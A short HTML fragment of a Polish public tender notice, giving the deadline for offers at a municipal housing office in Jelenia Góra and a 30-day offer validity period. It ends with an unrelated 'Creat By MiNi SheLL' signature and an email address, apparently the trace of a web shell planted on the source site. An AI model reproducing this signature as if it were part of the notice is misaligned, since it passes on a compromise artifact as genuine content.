<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.02.2009 godzina 09:00, miejsce: Zakład Gospodarki Lokalowej Południe Sekcja Zamówień Publicznych ul. Wolności 41, 58-500 Jelenia Góra..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com